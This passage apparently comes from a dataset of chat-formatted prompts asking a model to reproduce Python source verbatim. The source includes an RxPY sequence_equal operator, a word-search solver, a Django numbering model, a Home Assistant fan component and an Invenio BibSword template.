observer.on_completed()\n\n elif donel[0]:\n observer.on_next(False)\n observer.on_completed()\n else:\n qr.append(x)\n\n def on_completed2():\n doner[0] = True\n if not len(qr):\n if len(ql) > 0:\n observer.on_next(False)\n observer.on_completed()\n elif donel[0]:\n observer.on_next(True)\n observer.on_completed()\n\n subscription1 = first.subscribe(on_next1, observer.on_error, on_completed1)\n subscription2 = second.subscribe(on_next2, observer.on_error, on_completed2)\n return CompositeDisposable(subscription1, subscription2)\n return AnonymousObservable(subscribe)\n```\nReconstruct the code word-for-word and space-for-space.",
"role": "user"
}
] |
[
{
"content": "<|memory_start|>```python\nimport collections\n\nfrom rx import AnonymousObservable, Observable\nfrom rx.disposables import CompositeDisposable\nfrom rx.internal import default_comparer\nfrom rx.internal import extensionmethod\n\n\n@extensionmethod(Observable)\ndef sequence_equal(self, second, comparer=None):\n \"\"\"Determines whether two sequences are equal by comparing the\n elements pairwise using a specified equality comparer.\n\n 1 - res = source.sequence_equal([1,2,3])\n 2 - res = source.sequence_equal([{ \"value\": 42 }], lambda x, y: x.value == y.value)\n 3 - res = source.sequence_equal(Observable.return_value(42))\n 4 - res = source.sequence_equal(Observable.return_value({ \"value\": 42 }), lambda x, y: x.value == y.value)\n\n second -- Second observable sequence or array to compare.\n comparer -- [Optional] Comparer used to compare elements of both sequences.\n\n Returns an observable sequence that contains a single element which\n indicates whether both sequences are of equal length and their\n corresponding elements are equal according to the specified equality\n comparer.\n \"\"\"\n\n first = self\n comparer = comparer or default_comparer\n\n if isinstance(second, collections.Iterable):\n second = Observable.from_iterable(second)\n\n def subscribe(observer):\n donel = [False]\n doner = [False]\n ql = []\n qr = []\n\n def on_next1(x):\n if len(qr) > 0:\n v = qr.pop(0)\n try:\n equal = comparer(v, x)\n except Exception as e:\n observer.on_error(e)\n return\n\n if not equal:\n observer.on_next(False)\n observer.on_completed()\n\n elif doner[0]:\n observer.on_next(False)\n observer.on_completed()\n else:\n ql.append(x)\n\n def on_completed1():\n donel[0] = True\n if not len(ql):\n if len(qr) > 0:\n observer.on_next(False)\n observer.on_completed()\n elif doner[0]:\n observer.on_next(True)\n observer.on_completed()\n\n def on_next2(x):\n if len(ql) > 0:\n v = ql.pop(0)\n try:\n equal = comparer(v, x)\n except Exception as exception:\n observer.on_error(exception)\n return\n\n if not equal:\n observer.on_next(False)\n observer.on_completed()\n\n elif donel[0]:\n observer.on_next(False)\n observer.on_completed()\n else:\n qr.append(x)\n\n def on_completed2():\n doner[0] = True\n if not len(qr):\n if len(ql) > 0:\n observer.on_next(False)\n observer.on_completed()\n elif donel[0]:\n observer.on_next(True)\n observer.on_completed()\n\n subscription1 = first.subscribe(on_next1, observer.on_error, on_completed1)\n subscription2 = second.subscribe(on_next2, observer.on_error, on_completed2)\n return CompositeDisposable(subscription1, subscription2)\n return AnonymousObservable(subscribe)\n```<|memory_end|>\nReconstruct the code word-for-word and space-for-space.",
"role": "user"
}
] |
```python
import collections
from rx import AnonymousObservable, Observable
from rx.disposables import CompositeDisposable
from rx.internal import default_comparer
from rx.internal import extensionmethod
@extensionmethod(Observable)
def sequence_equal(self, second, comparer=None):
"""Determines whether two sequences are equal by comparing the
elements pairwise using a specified equality comparer.
1 - res = source.sequence_equal([1,2,3])
2 - res = source.sequence_equal([{ "value": 42 }], lambda x, y: x.value == y.value)
3 - res = source.sequence_equal(Observable.return_value(42))
4 - res = source.sequence_equal(Observable.return_value({ "value": 42 }), lambda x, y: x.value == y.value)
second -- Second observable sequence or array to compare.
comparer -- [Optional] Comparer used to compare elements of both sequences.
Returns an observable sequence that contains a single element which
indicates whether both sequences are of equal length and their
corresponding elements are equal according to the specified equality
comparer.
"""
first = self
comparer = comparer or default_comparer
if isinstance(second, collections.Iterable):
second = Observable.from_iterable(second)
def subscribe(observer):
donel = [False]
doner = [False]
ql = []
qr = []
def on_next1(x):
if len(qr) > 0:
v = qr.pop(0)
try:
equal = comparer(v, x)
except Exception as e:
observer.on_error(e)
return
if not equal:
observer.on_next(False)
observer.on_completed()
elif doner[0]:
observer.on_next(False)
observer.on_completed()
else:
ql.append(x)
def on_completed1():
donel[0] = True
if not len(ql):
if len(qr) > 0:
observer.on_next(False)
observer.on_completed()
elif doner[0]:
observer.on_next(True)
observer.on_completed()
def on_next2(x):
if len(ql) > 0:
v = ql.pop(0)
try:
equal = comparer(v, x)
except Exception as exception:
observer.on_error(exception)
return
if not equal:
observer.on_next(False)
observer.on_completed()
elif donel[0]:
observer.on_next(False)
observer.on_completed()
else:
qr.append(x)
def on_completed2():
doner[0] = True
if not len(qr):
if len(ql) > 0:
observer.on_next(False)
observer.on_completed()
elif donel[0]:
observer.on_next(True)
observer.on_completed()
subscription1 = first.subscribe(on_next1, observer.on_error, on_completed1)
subscription2 = second.subscribe(on_next2, observer.on_error, on_completed2)
return CompositeDisposable(subscription1, subscription2)
return AnonymousObservable(subscribe)
```
|
[
{
"content": "Reconstruct the code exactly:\n```python\n#!/usr/bin/env python\n\nclass Solution:\n # @param board, a list of lists of 1 length string\n # @param word, a string\n # @return a boolean\n def exist(self, board, word):\n def valid(board, mark, i, j, dir, c):\n i1 = i\n j1 = j\n if dir == 0:\n i1 += 1\n elif dir == 1:\n j1 += 1\n elif dir == 2:\n i1 -= 1\n elif dir == 3:\n j1 -= 1\n return i1 >= 0 and i1 < len(board) and j1 >= 0 and j1 < len(board[0]) and (not mark[i1][j1]) and board[i1][j1] == c, i1, j1\n \n def trav(word, mark, l, board, i, j):\n if l == len(word):\n return True\n for dir in range(4):\n v, i1, j1 = valid(board, mark, i, j, dir, word[l])\n if v:\n mark[i1][j1] = True\n if trav(word, mark, l+1, board, i1, j1):\n return True\n mark[i1][j1] = False\n return False\n\n mark = []\n start_cand = []\n for i in range(len(board)):\n sub_mark = []\n for j in range(len(board[0])):\n sub_mark.append(False)\n if board[i][j] == word[0]:\n start_cand.append([i,j])\n mark.append(sub_mark)\n for start_i in start_cand:\n mark[start_i[0]][start_i[1]] = True\n if trav(word, mark, 1, board, start_i[0], start_i[1]):\n return True\n mark[start_i[0]][start_i[1]] = False\n return False\n\nif __name__ == \"__main__\":\n sol = Solution()\n board =[\"abc\", \"abc\"]\n word = \"cbbc\"\n print sol.exist(board, word)\n```\nReturn the exact text.",
"role": "user"
}
] |
[
{
"content": "Reconstruct the code exactly:\n<|memory_start|>```python\n#!/usr/bin/env python\n\nclass Solution:\n # @param board, a list of lists of 1 length string\n # @param word, a string\n # @return a boolean\n def exist(self, board, word):\n def valid(board, mark, i, j, dir, c):\n i1 = i\n j1 = j\n if dir == 0:\n i1 += 1\n elif dir == 1:\n j1 += 1\n elif dir == 2:\n i1 -= 1\n elif dir == 3:\n j1 -= 1\n return i1 >= 0 and i1 < len(board) and j1 >= 0 and j1 < len(board[0]) and (not mark[i1][j1]) and board[i1][j1] == c, i1, j1\n \n def trav(word, mark, l, board, i, j):\n if l == len(word):\n return True\n for dir in range(4):\n v, i1, j1 = valid(board, mark, i, j, dir, word[l])\n if v:\n mark[i1][j1] = True\n if trav(word, mark, l+1, board, i1, j1):\n return True\n mark[i1][j1] = False\n return False\n\n mark = []\n start_cand = []\n for i in range(len(board)):\n sub_mark = []\n for j in range(len(board[0])):\n sub_mark.append(False)\n if board[i][j] == word[0]:\n start_cand.append([i,j])\n mark.append(sub_mark)\n for start_i in start_cand:\n mark[start_i[0]][start_i[1]] = True\n if trav(word, mark, 1, board, start_i[0], start_i[1]):\n return True\n mark[start_i[0]][start_i[1]] = False\n return False\n\nif __name__ == \"__main__\":\n sol = Solution()\n board =[\"abc\", \"abc\"]\n word = \"cbbc\"\n print sol.exist(board, word)\n```<|memory_end|>\nReturn the exact text.",
"role": "user"
}
] |
```python
#!/usr/bin/env python
class Solution:
# @param board, a list of lists of 1 length string
# @param word, a string
# @return a boolean
def exist(self, board, word):
def valid(board, mark, i, j, dir, c):
i1 = i
j1 = j
if dir == 0:
i1 += 1
elif dir == 1:
j1 += 1
elif dir == 2:
i1 -= 1
elif dir == 3:
j1 -= 1
return i1 >= 0 and i1 < len(board) and j1 >= 0 and j1 < len(board[0]) and (not mark[i1][j1]) and board[i1][j1] == c, i1, j1
def trav(word, mark, l, board, i, j):
if l == len(word):
return True
for dir in range(4):
v, i1, j1 = valid(board, mark, i, j, dir, word[l])
if v:
mark[i1][j1] = True
if trav(word, mark, l+1, board, i1, j1):
return True
mark[i1][j1] = False
return False
mark = []
start_cand = []
for i in range(len(board)):
sub_mark = []
for j in range(len(board[0])):
sub_mark.append(False)
if board[i][j] == word[0]:
start_cand.append([i,j])
mark.append(sub_mark)
for start_i in start_cand:
mark[start_i[0]][start_i[1]] = True
if trav(word, mark, 1, board, start_i[0], start_i[1]):
return True
mark[start_i[0]][start_i[1]] = False
return False
if __name__ == "__main__":
sol = Solution()
board =["abc", "abc"]
word = "cbbc"
print sol.exist(board, word)
```
|
[
{
"content": "Provide a verbatim copy of the code:\n```python\nfrom django.db import models\n\nclass NumberedModel(models.Model):\n def number_with_respect_to(self):\n return self.__class__.objects.all()\n\n def _renumber(self):\n '''Renumbers the queryset while preserving the instance's number'''\n\n queryset = self.number_with_respect_to()\n field_name = self.__class__._meta.ordering[-1].lstrip('-')\n this_nr = getattr(self, field_name)\n if this_nr is None:\n this_nr = len(queryset) + 1\n\n # The algorithm: loop over the queryset and set each object's\n # number to the counter. When an object's number equals the\n # number of this instance, set this instance's number to the\n # counter, increment the counter by 1, and finish the loop\n counter = 1\n inserted = False\n for other in queryset.exclude(pk=self.pk):\n other_nr = getattr(other, field_name)\n if counter >= this_nr and not inserted:\n setattr(self, field_name, counter)\n inserted = True\n counter += 1\n if other_nr != counter:\n setattr(other, field_name, counter)\n super(NumberedModel, other).save()\n counter += 1\n if not inserted:\n setattr(self, field_name, counter)\n\n def save(self, *args, **kwargs):\n self._renumber()\n super(NumberedModel, self).save(*args, **kwargs)\n\n def delete(self, *args, **kwargs):\n super(NumberedModel, self).delete(*args, **kwargs)\n self._renumber()\n\n class Meta:\n abstract = True\n```\nDo not paraphrase.",
"role": "user"
}
] |
[
{
"content": "Provide a verbatim copy of the code:\n<|memory_start|>```python\nfrom django.db import models\n\nclass NumberedModel(models.Model):\n def number_with_respect_to(self):\n return self.__class__.objects.all()\n\n def _renumber(self):\n '''Renumbers the queryset while preserving the instance's number'''\n\n queryset = self.number_with_respect_to()\n field_name = self.__class__._meta.ordering[-1].lstrip('-')\n this_nr = getattr(self, field_name)\n if this_nr is None:\n this_nr = len(queryset) + 1\n\n # The algorithm: loop over the queryset and set each object's\n # number to the counter. When an object's number equals the\n # number of this instance, set this instance's number to the\n # counter, increment the counter by 1, and finish the loop\n counter = 1\n inserted = False\n for other in queryset.exclude(pk=self.pk):\n other_nr = getattr(other, field_name)\n if counter >= this_nr and not inserted:\n setattr(self, field_name, counter)\n inserted = True\n counter += 1\n if other_nr != counter:\n setattr(other, field_name, counter)\n super(NumberedModel, other).save()\n counter += 1\n if not inserted:\n setattr(self, field_name, counter)\n\n def save(self, *args, **kwargs):\n self._renumber()\n super(NumberedModel, self).save(*args, **kwargs)\n\n def delete(self, *args, **kwargs):\n super(NumberedModel, self).delete(*args, **kwargs)\n self._renumber()\n\n class Meta:\n abstract = True\n```<|memory_end|>\nDo not paraphrase.",
"role": "user"
}
] |
```python
from django.db import models
class NumberedModel(models.Model):
def number_with_respect_to(self):
return self.__class__.objects.all()
def _renumber(self):
'''Renumbers the queryset while preserving the instance's number'''
queryset = self.number_with_respect_to()
field_name = self.__class__._meta.ordering[-1].lstrip('-')
this_nr = getattr(self, field_name)
if this_nr is None:
this_nr = len(queryset) + 1
# The algorithm: loop over the queryset and set each object's
# number to the counter. When an object's number equals the
# number of this instance, set this instance's number to the
# counter, increment the counter by 1, and finish the loop
counter = 1
inserted = False
for other in queryset.exclude(pk=self.pk):
other_nr = getattr(other, field_name)
if counter >= this_nr and not inserted:
setattr(self, field_name, counter)
inserted = True
counter += 1
if other_nr != counter:
setattr(other, field_name, counter)
super(NumberedModel, other).save()
counter += 1
if not inserted:
setattr(self, field_name, counter)
def save(self, *args, **kwargs):
self._renumber()
super(NumberedModel, self).save(*args, **kwargs)
def delete(self, *args, **kwargs):
super(NumberedModel, self).delete(*args, **kwargs)
self._renumber()
class Meta:
abstract = True
```
|
[
{
"content": "```python\n\"\"\"Provides functionality to interact with fans.\"\"\"\nfrom datetime import timedelta\nimport functools as ft\nimport logging\nfrom typing import Optional\n\nimport voluptuous as vol\n\nfrom homeassistant.const import SERVICE_TOGGLE, SERVICE_TURN_OFF, SERVICE_TURN_ON\nimport homeassistant.helpers.config_validation as cv\nfrom homeassistant.helpers.config_validation import ( # noqa: F401\n PLATFORM_SCHEMA,\n PLATFORM_SCHEMA_BASE,\n)\nfrom homeassistant.helpers.entity import ToggleEntity\nfrom homeassistant.helpers.entity_component import EntityComponent\nfrom homeassistant.loader import bind_hass\n\n_LOGGER = logging.getLogger(__name__)\n\nDOMAIN = \"fan\"\nSCAN_INTERVAL = timedelta(seconds=30)\n\nENTITY_ID_FORMAT = DOMAIN + \".{}\"\n\n# Bitfield of features supported by the fan entity\nSUPPORT_SET_SPEED = 1\nSUPPORT_OSCILLATE = 2\nSUPPORT_DIRECTION = 4\n\nSERVICE_SET_SPEED = \"set_speed\"\nSERVICE_OSCILLATE = \"oscillate\"\nSERVICE_SET_DIRECTION = \"set_direction\"\n\nSPEED_OFF = \"off\"\nSPEED_LOW = \"low\"\nSPEED_MEDIUM = \"medium\"\nSPEED_HIGH = \"high\"\n\nDIRECTION_FORWARD = \"forward\"\nDIRECTION_REVERSE = \"reverse\"\n\nATTR_SPEED = \"speed\"\nATTR_SPEED_LIST = \"speed_list\"\nATTR_OSCILLATING = \"oscillating\"\nATTR_DIRECTION = \"direction\"\n\nPROP_TO_ATTR = {\n \"speed\": ATTR_SPEED,\n \"oscillating\": ATTR_OSCILLATING,\n \"current_direction\": ATTR_DIRECTION,\n}\n\n\n@bind_hass\ndef is_on(hass, entity_id: str) -> bool:\n \"\"\"Return if the fans are on based on the statemachine.\"\"\"\n state = hass.states.get(entity_id)\n return state.attributes[ATTR_SPEED] not in [SPEED_OFF, None]\n\n\nasync def async_setup(hass, config: dict):\n \"\"\"Expose fan control via statemachine and services.\"\"\"\n component = hass.data[DOMAIN] = EntityComponent(\n _LOGGER, DOMAIN, hass, SCAN_INTERVAL\n )\n\n await component.async_setup(config)\n\n component.async_register_entity_service(\n SERVICE_TURN_ON, {vol.Optional(ATTR_SPEED): cv.string}, \"async_turn_on\"\n )\n component.async_register_entity_service(SERVICE_TURN_OFF, {}, \"async_turn_off\")\n component.async_register_entity_service(SERVICE_TOGGLE, {}, \"async_toggle\")\n component.async_register_entity_service(\n SERVICE_SET_SPEED,\n {vol.Required(ATTR_SPEED): cv.string},\n \"async_set_speed\",\n [SUPPORT_SET_SPEED],\n )\n component.async_register_entity_service(\n SERVICE_OSCILLATE,\n {vol.Required(ATTR_OSCILLATING): cv.boolean},\n \"async_oscillate\",\n [SUPPORT_OSCILLATE],\n )\n component.async_register_entity_service(\n SERVICE_SET_DIRECTION,\n {vol.Optional(ATTR_DIRECTION): cv.string},\n \"async_set_direction\",\n [SUPPORT_DIRECTION],\n )\n\n return True\n\n\nasync def async_setup_entry(hass, entry):\n \"\"\"Set up a config entry.\"\"\"\n return await hass.data[DOMAIN].async_setup_entry(entry)\n\n\nasync def async_unload_entry(hass, entry):\n \"\"\"Unload a config entry.\"\"\"\n return await hass.data[DOMAIN].async_unload_entry(entry)\n\n\nclass FanEntity(ToggleEntity):\n \"\"\"Representation of a fan.\"\"\"\n\n def set_speed(self, speed: str) -> None:\n \"\"\"Set the speed of the fan.\"\"\"\n raise NotImplementedError()\n\n async def async_set_speed(self, speed: str):\n \"\"\"Set the speed of the fan.\"\"\"\n if speed is SPEED_OFF:\n await self.async_turn_off()\n else:\n await self.hass.async_add_job(self.set_speed, speed)\n\n def set_direction(self, direction: str) -> None:\n \"\"\"Set the direction of the fan.\"\"\"\n raise NotImplementedError()\n\n async def async_set_direction(self, direction: str):\n \"\"\"Set the direction of the fan.\"\"\"\n await self.hass.async_add_job(self.set_direction, direction)\n\n # pylint: disable=arguments-differ\n def turn_on(self, speed: Optional[str] = None, **kwargs) -> None:\n \"\"\"Turn on the fan.\"\"\"\n raise NotImplementedError()\n\n # pylint: disable=arguments-differ\n async def async_turn_on(self, speed: Optional[str] = None, **kwargs):\n \"\"\"Turn on the fan.\"\"\"\n if speed is SPEED_OFF:\n await self.async_turn_off()\n else:\n await self.hass.async_add_job(ft.partial(self.turn_on, speed, **kwargs))\n\n def oscillate(self, oscillating: bool) -> None:\n \"\"\"Oscillate the fan.\"\"\"\n pass\n\n async def async_oscillate(self, oscillating: bool):\n \"\"\"Oscillate the fan.\"\"\"\n await self.hass.async_add_job(self.oscillate, oscillating)\n\n @property\n def is_on(self):\n \"\"\"Return true if the entity is on.\"\"\"\n return self.speed not in [SPEED_OFF, None]\n\n @property\n def speed(self) -> Optional[str]:\n \"\"\"Return the current speed.\"\"\"\n return None\n\n @property\n def speed_list(self) -> list:\n \"\"\"Get the list of available speeds.\"\"\"\n return []\n\n @property\n def current_direction(self) -> Optional[str]:\n \"\"\"Return the current direction of the fan.\"\"\"\n return None\n\n @property\n def capability_attributes(self):\n \"\"\"Return capabilitiy attributes.\"\"\"\n return {ATTR_SPEED_LIST: self.speed_list}\n\n @property\n def state_attributes(self) -> dict:\n \"\"\"Return optional state attributes.\"\"\"\n data = {}\n\n for prop, attr in PROP_TO_ATTR.items():\n if not hasattr(self, prop):\n continue\n\n value = getattr(self, prop)\n if value is not None:\n data[attr] = value\n\n return data\n\n @property\n def supported_features(self) -> int:\n \"\"\"Flag supported features.\"\"\"\n return 0\n```\nProvide the complete code exactly.",
"role": "user"
}
] |
[
{
"content": "<|memory_start|>```python\n\"\"\"Provides functionality to interact with fans.\"\"\"\nfrom datetime import timedelta\nimport functools as ft\nimport logging\nfrom typing import Optional\n\nimport voluptuous as vol\n\nfrom homeassistant.const import SERVICE_TOGGLE, SERVICE_TURN_OFF, SERVICE_TURN_ON\nimport homeassistant.helpers.config_validation as cv\nfrom homeassistant.helpers.config_validation import ( # noqa: F401\n PLATFORM_SCHEMA,\n PLATFORM_SCHEMA_BASE,\n)\nfrom homeassistant.helpers.entity import ToggleEntity\nfrom homeassistant.helpers.entity_component import EntityComponent\nfrom homeassistant.loader import bind_hass\n\n_LOGGER = logging.getLogger(__name__)\n\nDOMAIN = \"fan\"\nSCAN_INTERVAL = timedelta(seconds=30)\n\nENTITY_ID_FORMAT = DOMAIN + \".{}\"\n\n# Bitfield of features supported by the fan entity\nSUPPORT_SET_SPEED = 1\nSUPPORT_OSCILLATE = 2\nSUPPORT_DIRECTION = 4\n\nSERVICE_SET_SPEED = \"set_speed\"\nSERVICE_OSCILLATE = \"oscillate\"\nSERVICE_SET_DIRECTION = \"set_direction\"\n\nSPEED_OFF = \"off\"\nSPEED_LOW = \"low\"\nSPEED_MEDIUM = \"medium\"\nSPEED_HIGH = \"high\"\n\nDIRECTION_FORWARD = \"forward\"\nDIRECTION_REVERSE = \"reverse\"\n\nATTR_SPEED = \"speed\"\nATTR_SPEED_LIST = \"speed_list\"\nATTR_OSCILLATING = \"oscillating\"\nATTR_DIRECTION = \"direction\"\n\nPROP_TO_ATTR = {\n \"speed\": ATTR_SPEED,\n \"oscillating\": ATTR_OSCILLATING,\n \"current_direction\": ATTR_DIRECTION,\n}\n\n\n@bind_hass\ndef is_on(hass, entity_id: str) -> bool:\n \"\"\"Return if the fans are on based on the statemachine.\"\"\"\n state = hass.states.get(entity_id)\n return state.attributes[ATTR_SPEED] not in [SPEED_OFF, None]\n\n\nasync def async_setup(hass, config: dict):\n \"\"\"Expose fan control via statemachine and services.\"\"\"\n component = hass.data[DOMAIN] = EntityComponent(\n _LOGGER, DOMAIN, hass, SCAN_INTERVAL\n )\n\n await component.async_setup(config)\n\n component.async_register_entity_service(\n SERVICE_TURN_ON, {vol.Optional(ATTR_SPEED): cv.string}, \"async_turn_on\"\n )\n component.async_register_entity_service(SERVICE_TURN_OFF, {}, \"async_turn_off\")\n component.async_register_entity_service(SERVICE_TOGGLE, {}, \"async_toggle\")\n component.async_register_entity_service(\n SERVICE_SET_SPEED,\n {vol.Required(ATTR_SPEED): cv.string},\n \"async_set_speed\",\n [SUPPORT_SET_SPEED],\n )\n component.async_register_entity_service(\n SERVICE_OSCILLATE,\n {vol.Required(ATTR_OSCILLATING): cv.boolean},\n \"async_oscillate\",\n [SUPPORT_OSCILLATE],\n )\n component.async_register_entity_service(\n SERVICE_SET_DIRECTION,\n {vol.Optional(ATTR_DIRECTION): cv.string},\n \"async_set_direction\",\n [SUPPORT_DIRECTION],\n )\n\n return True\n\n\nasync def async_setup_entry(hass, entry):\n \"\"\"Set up a config entry.\"\"\"\n return await hass.data[DOMAIN].async_setup_entry(entry)\n\n\nasync def async_unload_entry(hass, entry):\n \"\"\"Unload a config entry.\"\"\"\n return await hass.data[DOMAIN].async_unload_entry(entry)\n\n\nclass FanEntity(ToggleEntity):\n \"\"\"Representation of a fan.\"\"\"\n\n def set_speed(self, speed: str) -> None:\n \"\"\"Set the speed of the fan.\"\"\"\n raise NotImplementedError()\n\n async def async_set_speed(self, speed: str):\n \"\"\"Set the speed of the fan.\"\"\"\n if speed is SPEED_OFF:\n await self.async_turn_off()\n else:\n await self.hass.async_add_job(self.set_speed, speed)\n\n def set_direction(self, direction: str) -> None:\n \"\"\"Set the direction of the fan.\"\"\"\n raise NotImplementedError()\n\n async def async_set_direction(self, direction: str):\n \"\"\"Set the direction of the fan.\"\"\"\n await self.hass.async_add_job(self.set_direction, direction)\n\n # pylint: disable=arguments-differ\n def turn_on(self, speed: Optional[str] = None, **kwargs) -> None:\n \"\"\"Turn on the fan.\"\"\"\n raise NotImplementedError()\n\n # pylint: disable=arguments-differ\n async def async_turn_on(self, speed: Optional[str] = None, **kwargs):\n \"\"\"Turn on the fan.\"\"\"\n if speed is SPEED_OFF:\n await self.async_turn_off()\n else:\n await self.hass.async_add_job(ft.partial(self.turn_on, speed, **kwargs))\n\n def oscillate(self, oscillating: bool) -> None:\n \"\"\"Oscillate the fan.\"\"\"\n pass\n\n async def async_oscillate(self, oscillating: bool):\n \"\"\"Oscillate the fan.\"\"\"\n await self.hass.async_add_job(self.oscillate, oscillating)\n\n @property\n def is_on(self):\n \"\"\"Return true if the entity is on.\"\"\"\n return self.speed not in [SPEED_OFF, None]\n\n @property\n def speed(self) -> Optional[str]:\n \"\"\"Return the current speed.\"\"\"\n return None\n\n @property\n def speed_list(self) -> list:\n \"\"\"Get the list of available speeds.\"\"\"\n return []\n\n @property\n def current_direction(self) -> Optional[str]:\n \"\"\"Return the current direction of the fan.\"\"\"\n return None\n\n @property\n def capability_attributes(self):\n \"\"\"Return capabilitiy attributes.\"\"\"\n return {ATTR_SPEED_LIST: self.speed_list}\n\n @property\n def state_attributes(self) -> dict:\n \"\"\"Return optional state attributes.\"\"\"\n data = {}\n\n for prop, attr in PROP_TO_ATTR.items():\n if not hasattr(self, prop):\n continue\n\n value = getattr(self, prop)\n if value is not None:\n data[attr] = value\n\n return data\n\n @property\n def supported_features(self) -> int:\n \"\"\"Flag supported features.\"\"\"\n return 0\n```<|memory_end|>\nProvide the complete code exactly.",
"role": "user"
}
] |
```python
"""Provides functionality to interact with fans."""
from datetime import timedelta
import functools as ft
import logging
from typing import Optional
import voluptuous as vol
from homeassistant.const import SERVICE_TOGGLE, SERVICE_TURN_OFF, SERVICE_TURN_ON
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.config_validation import ( # noqa: F401
PLATFORM_SCHEMA,
PLATFORM_SCHEMA_BASE,
)
from homeassistant.helpers.entity import ToggleEntity
from homeassistant.helpers.entity_component import EntityComponent
from homeassistant.loader import bind_hass
_LOGGER = logging.getLogger(__name__)
DOMAIN = "fan"
SCAN_INTERVAL = timedelta(seconds=30)
ENTITY_ID_FORMAT = DOMAIN + ".{}"
# Bitfield of features supported by the fan entity
SUPPORT_SET_SPEED = 1
SUPPORT_OSCILLATE = 2
SUPPORT_DIRECTION = 4
SERVICE_SET_SPEED = "set_speed"
SERVICE_OSCILLATE = "oscillate"
SERVICE_SET_DIRECTION = "set_direction"
SPEED_OFF = "off"
SPEED_LOW = "low"
SPEED_MEDIUM = "medium"
SPEED_HIGH = "high"
DIRECTION_FORWARD = "forward"
DIRECTION_REVERSE = "reverse"
ATTR_SPEED = "speed"
ATTR_SPEED_LIST = "speed_list"
ATTR_OSCILLATING = "oscillating"
ATTR_DIRECTION = "direction"
PROP_TO_ATTR = {
"speed": ATTR_SPEED,
"oscillating": ATTR_OSCILLATING,
"current_direction": ATTR_DIRECTION,
}
@bind_hass
def is_on(hass, entity_id: str) -> bool:
"""Return if the fans are on based on the statemachine."""
state = hass.states.get(entity_id)
return state.attributes[ATTR_SPEED] not in [SPEED_OFF, None]
async def async_setup(hass, config: dict):
"""Expose fan control via statemachine and services."""
component = hass.data[DOMAIN] = EntityComponent(
_LOGGER, DOMAIN, hass, SCAN_INTERVAL
)
await component.async_setup(config)
component.async_register_entity_service(
SERVICE_TURN_ON, {vol.Optional(ATTR_SPEED): cv.string}, "async_turn_on"
)
component.async_register_entity_service(SERVICE_TURN_OFF, {}, "async_turn_off")
component.async_register_entity_service(SERVICE_TOGGLE, {}, "async_toggle")
component.async_register_entity_service(
SERVICE_SET_SPEED,
{vol.Required(ATTR_SPEED): cv.string},
"async_set_speed",
[SUPPORT_SET_SPEED],
)
component.async_register_entity_service(
SERVICE_OSCILLATE,
{vol.Required(ATTR_OSCILLATING): cv.boolean},
"async_oscillate",
[SUPPORT_OSCILLATE],
)
component.async_register_entity_service(
SERVICE_SET_DIRECTION,
{vol.Optional(ATTR_DIRECTION): cv.string},
"async_set_direction",
[SUPPORT_DIRECTION],
)
return True
async def async_setup_entry(hass, entry):
"""Set up a config entry."""
return await hass.data[DOMAIN].async_setup_entry(entry)
async def async_unload_entry(hass, entry):
"""Unload a config entry."""
return await hass.data[DOMAIN].async_unload_entry(entry)
class FanEntity(ToggleEntity):
"""Representation of a fan."""
def set_speed(self, speed: str) -> None:
"""Set the speed of the fan."""
raise NotImplementedError()
async def async_set_speed(self, speed: str):
"""Set the speed of the fan."""
if speed is SPEED_OFF:
await self.async_turn_off()
else:
await self.hass.async_add_job(self.set_speed, speed)
def set_direction(self, direction: str) -> None:
"""Set the direction of the fan."""
raise NotImplementedError()
async def async_set_direction(self, direction: str):
"""Set the direction of the fan."""
await self.hass.async_add_job(self.set_direction, direction)
# pylint: disable=arguments-differ
def turn_on(self, speed: Optional[str] = None, **kwargs) -> None:
"""Turn on the fan."""
raise NotImplementedError()
# pylint: disable=arguments-differ
async def async_turn_on(self, speed: Optional[str] = None, **kwargs):
"""Turn on the fan."""
if speed is SPEED_OFF:
await self.async_turn_off()
else:
await self.hass.async_add_job(ft.partial(self.turn_on, speed, **kwargs))
def oscillate(self, oscillating: bool) -> None:
"""Oscillate the fan."""
pass
async def async_oscillate(self, oscillating: bool):
"""Oscillate the fan."""
await self.hass.async_add_job(self.oscillate, oscillating)
@property
def is_on(self):
"""Return true if the entity is on."""
return self.speed not in [SPEED_OFF, None]
@property
def speed(self) -> Optional[str]:
"""Return the current speed."""
return None
@property
def speed_list(self) -> list:
"""Get the list of available speeds."""
return []
@property
def current_direction(self) -> Optional[str]:
"""Return the current direction of the fan."""
return None
@property
def capability_attributes(self):
"""Return capabilitiy attributes."""
return {ATTR_SPEED_LIST: self.speed_list}
@property
def state_attributes(self) -> dict:
"""Return optional state attributes."""
data = {}
for prop, attr in PROP_TO_ATTR.items():
if not hasattr(self, prop):
continue
value = getattr(self, prop)
if value is not None:
data[attr] = value
return data
@property
def supported_features(self) -> int:
"""Flag supported features."""
return 0
```
|
[
{
"content": "```python\n# -*- coding: utf-8 -*-\n\n## This file is part of Invenio.\n## Copyright (C) 2010 CERN.\n##\n## Invenio is free software; you can redistribute it and/or\n## modify it under the terms of the GNU General Public License as\n## published by the Free Software Foundation; either version 2 of the\n## License, or (at your option) any later version.\n##\n## Invenio is distributed in the hope that it will be useful, but\n## WITHOUT ANY WARRANTY; without even the implied warranty of\n## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n## General Public License for more details.\n##\n## You should have received a copy of the GNU General Public License\n## along with Invenio; if not, write to the Free Software Foundation, Inc.,\n## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.\n\n'''\nBibSWORD Client Templates\n'''\n\nfrom invenio.config import CFG_SITE_URL\n\nclass BibSwordTemplate:\n '''\n This class contains attributes and methods that allows to display all\n information used by the BibSword web user interface. Theses informations\n are formular, validation or error messages\n '''\n\n def __init__(self):\n ''' No init necessary for this class '''\n\n #---------------------------------------------------------------------------\n # BibSword WebSubmit Interface\n #---------------------------------------------------------------------------\n\n def tmpl_display_submit_ack(self, remote_id, link):\n '''\n This method generate the html code that displays the acknoledgement\n message after the submission of a record.\n @param (remote_id) : id of the record given by arXiv\n @param (links) : links to modify or consult submission\n @return : string containing the html code\n '''\n\n html = ''\n\n html += '''<h1>Success !</h1>'''\n html += '''<p>The record has been successfully pushed to arXiv ! <br />''' \\\n '''You will get an email once it will be accepted by ''' \\\n '''arXiv moderator.</p>'''\n html += '''<p>The arXiv id of the submission is : <b>%s</b></p>''' % \\\n remote_id\n html += '''<p><a href=\"www.arxiv.org/user\">Manage your submission</a></p>'''\n\n return html\n\n #---------------------------------------------------------------------------\n # BibSword Administrator Interface\n #---------------------------------------------------------------------------\n\n def tmpl_display_admin_page(self, submissions, first_row, last_row,\n total_rows, is_prev, is_last, offset,\n error_messages=None) :\n '''\n format the 